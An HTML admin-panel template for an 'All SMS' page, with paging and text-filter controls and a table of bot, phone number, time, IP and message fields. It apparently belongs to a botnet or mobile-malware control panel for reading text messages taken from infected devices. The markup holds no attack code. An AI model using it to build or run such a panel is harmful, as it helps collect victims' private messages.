
<div class="row">

	<div class="col-lg-12">
		<div class="panel panel-default">
			<div class="panel-heading">
				<h3 class="panel-title">All SMS</h3>
			</div>
			<div class="panel-body">
				<div class="row">
					<div class="col-md-12">

<span style="display: %NO_SMS%" class="text-center">No SMS yet</span>

<span style="display: %HAS_SMS%">

	<form id="search_form">
		<input type="hidden" name="a" value="admin" />
		<input type="hidden" name="action" value="sms" />
		
		Page: <select name='page_number'>%PAGES_LIST%</select> of %PAGES_TOTAL%
		&nbsp;&nbsp;
		Rows: <select name='rows_number'>%ROWS_LIST%</select>
		&nbsp;&nbsp;
		Text: <input id='filter_text' type='text' name='filter_text' style='
		color: #555; border: 1px solid #ccc; border-radius: 3px; height: 30px; width: 100px; font-size: 10pt' class='input-sm' value="%FILTER_TEXT%" />
		<input type="submit" value="Show" class="btn btn-primary" /> 
		<input type="button" onclick="$('#filter_text').val(''); $('#search_form').submit()" value="Reset" class="btn btn-warning" /> 
	</form>

	<br />
	<br />
</span>
					</div>
				</div>
				
				<div class="row" style="display: %HAS_SMS%">
					<div class="col-md-12">
						<table class="table table-bordered">
							<tr>
								<th width="10">Bot</th>
								<th width="30">Number</th>
								<th>Time</th>
								<th>IP</th>
								<th>Message</th>
							</tr>
							
							%SMS_ROWS%
						</table>
					</div>
				</div>
			</div>
		</div>
	</div>
	
</div>














